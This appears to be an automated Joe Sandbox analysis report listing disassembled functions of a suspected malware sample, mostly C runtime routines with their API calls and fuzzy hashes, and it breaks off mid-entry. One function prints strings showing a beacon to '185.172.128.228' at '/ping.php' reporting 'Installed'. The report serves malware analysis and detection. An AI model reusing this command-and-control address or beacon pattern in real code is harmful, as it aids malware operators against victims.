                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                  • Instruction ID: dd2835c9885c6aa3f8cce8b3b5d5cac91b3775441f4e2c90be38872ca8706c4a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A341D332E00710EFDB15DFA9C880A9AB7B1EF89314B1545AAE515EB382D735AD41CB84
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041B429 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00411992,?,00000000,?,00000001,?,?,00000001,00411992,?), ref: 0041B476
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0041B4AE
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B4FF
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DE7,?), ref: 0041B511
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0041B51A
                                                                                                                                                                                                                                    • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 313313983-0
                                                                                                                                                                                                                                  • Opcode ID: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
                                                                                                                                                                                                                                  • Instruction ID: e6e93543b041c594e81487d5909f541e573430f1ea5015fd54542e6688d1641d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E931AC32A0021AABDB249F65DC41DEF7BA5EF40318F04412AFC04D6291EB39CD95CB94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041E533 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0041E53C
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E55F
                                                                                                                                                                                                                                    • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E585
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041E598
                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E5A7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                                                  • Opcode ID: fd9cb40695fd0089d65125f9c917d3271f033025ad03b813fa21ea85d7d026fb
                                                                                                                                                                                                                                  • Instruction ID: da1d7805988d3e4f29d48d7d5147bf5fd0936ba562dc79f78d94e6ba61cfb34a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd9cb40695fd0089d65125f9c917d3271f033025ad03b813fa21ea85d7d026fb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4901D8766027207F23211AB75C48DFF6E6EDEC6B98355012EFD08D6200FE688D429178
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CFE79A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 05CFE7A3
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 05CFE7C6
                                                                                                                                                                                                                                    • Part of subcall function 05CF7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05CF7CDE
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 05CFE7EC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFE7FF
                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 05CFE80E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                                                  • Opcode ID: 38dd7213b9bcb45c1147e39a21c5c15d2d7fc2ddc2b943de6988b854aed99f6c
                                                                                                                                                                                                                                  • Instruction ID: 52facd71f7fde047368477b84c048f74ffdf0056b855fb3e5f069d9476927052
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38dd7213b9bcb45c1147e39a21c5c15d2d7fc2ddc2b943de6988b854aed99f6c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C401B1727066617F27F126AA6C8CC7F797DEAC29A03150529FB05D2120EE618D0282B5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00416D9D Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416DD7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416DFE
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00416E0B
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00416E14
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                  • Opcode ID: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
                                                                                                                                                                                                                                  • Instruction ID: e46c26cc5ac3d344e97fba90109cbcfbfaa945fe7b6790f8bafc9466d81cae3c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA01D6367447106A82217676BC85EEB2629DBC5764763027FF515A2282EF2CCC86515C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041EE9E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041EEB6
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041EEC8
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041EEDA
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041EEEC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041EEFE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                  • Instruction ID: 4b083a6e31e8a48a8b86c3cb0939e7a8061e9024a6891407e723d3d4127bfca1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09F04F32504310AB8A20EB6AF886E9773D9FA44764355480AFD08D7600CB38FCC0869C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CFF105 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF11D
                                                                                                                                                                                                                                    • Part of subcall function 05CF6501: HeapFree.KERNEL32(00000000,00000000,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?), ref: 05CF6517
                                                                                                                                                                                                                                    • Part of subcall function 05CF6501: GetLastError.KERNEL32(?,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?,?), ref: 05CF6529
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF12F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF141
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF153
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF165
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                  • Instruction ID: 9a504017d32dabecfcf7f9d749970e0d81ed1d7df4605254774de0c11a187e0d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3FF01232518601BB8AB0DBA8E8C9D1B73E9FA047507645C19F786E7510CB31FAC14B95
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004152B2 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004152D0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004152E2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004152F5
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00415306
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00415317
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction ID: 0846cff003075c5ec292790c94e0e8fa2dbc871af0b69e12aa43d6fe7fad35b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9F0DAB18017209BCA167F19FC816893B60FB5872872271BBF919A6275CB3959818FCD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CF5519 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF5537
                                                                                                                                                                                                                                    • Part of subcall function 05CF6501: HeapFree.KERNEL32(00000000,00000000,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?), ref: 05CF6517
                                                                                                                                                                                                                                    • Part of subcall function 05CF6501: GetLastError.KERNEL32(?,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?,?), ref: 05CF6529
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF5549
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF555C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF556D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF557E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction ID: d78fd46c7358000eed82f4b7b6316fe2caa7a619e83e367af225bfc888db3443
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67F05EB1911221ABCEA66F58FCC45153B61FB04620311797AF709B2278CF364A81AFCA
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041608E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 0-2895899722
                                                                                                                                                                                                                                  • Opcode ID: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                  • Instruction ID: b548a9a7138a64da7a824066f4516bdc11857ebac08ae9c998b6d8d4508c541d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF51C171D40209ABDB10AFA9C945FEF7BB8AF45314F12015BE804B7292D778D981CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041D851 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _strpbrk.LIBCMT ref: 0041D8A0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041D9BD
                                                                                                                                                                                                                                    • Part of subcall function 00410932: IsProcessorFeaturePresent.KERNEL32(00000017,00410904,00000016,00412B39,0000002C,00439740,0041D3CD,?,?,?,00410911,00000000,00000000,00000000,00000000,00000000), ref: 00410934
                                                                                                                                                                                                                                    • Part of subcall function 00410932: GetCurrentProcess.KERNEL32(C0000417,00412B39,00000016,00416D9C), ref: 00410956
                                                                                                                                                                                                                                    • Part of subcall function 00410932: TerminateProcess.KERNEL32(00000000), ref: 0041095D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                                                  • API String ID: 2812119850-3972193922
                                                                                                                                                                                                                                  • Opcode ID: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                  • Instruction ID: 8cfe7552e8cc1931d7ce14f3a793833fed444a164ef8b9e72ccff9a48bf79fb4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9251B3B1E00219AFDF14DFA9C881AEEBBB5EF48314F24416EE854E7341D6399E41CB54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004132C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe,00000104), ref: 00413303
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004133CE
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004133D8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                  • String ID: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe
                                                                                                                                                                                                                                  • API String ID: 2506810119-1288547603
                                                                                                                                                                                                                                  • Opcode ID: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction ID: ddf04b2862e1199f4fb1385bf4b9d3a7dff69665be34de18e7ab35541f588614
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD319571A00218AFDB219F5A9C819DEBBB8EB85315F1041ABFC14D7210DB749B81CB9C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CF352A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe,00000104), ref: 05CF356A
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF3635
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF363F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                  • String ID: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe
                                                                                                                                                                                                                                  • API String ID: 2506810119-1288547603
                                                                                                                                                                                                                                  • Opcode ID: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction ID: 6a1045540fbd814449d0b97740580c2b667562426166593ebb310aa4d2cd255d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF3181B1A04298BFDB61DB99DC84DAEBBFDFB84B10F104866E605A7310D7709A40DB94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040356F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: /ping.php?substr=%s$185.172.128.228$Installed
                                                                                                                                                                                                                                  • API String ID: 3519838083-3380671521
                                                                                                                                                                                                                                  • Opcode ID: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction ID: 895aa7ca95bfe32917cece0cc4021e99c0fa9e15b4dc78af84e68f763d0dcda6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E01A172A01114BBDB04AF89DC41BAEF769EF89315F10013FF805E3291D3789E4186E9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CE37D6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
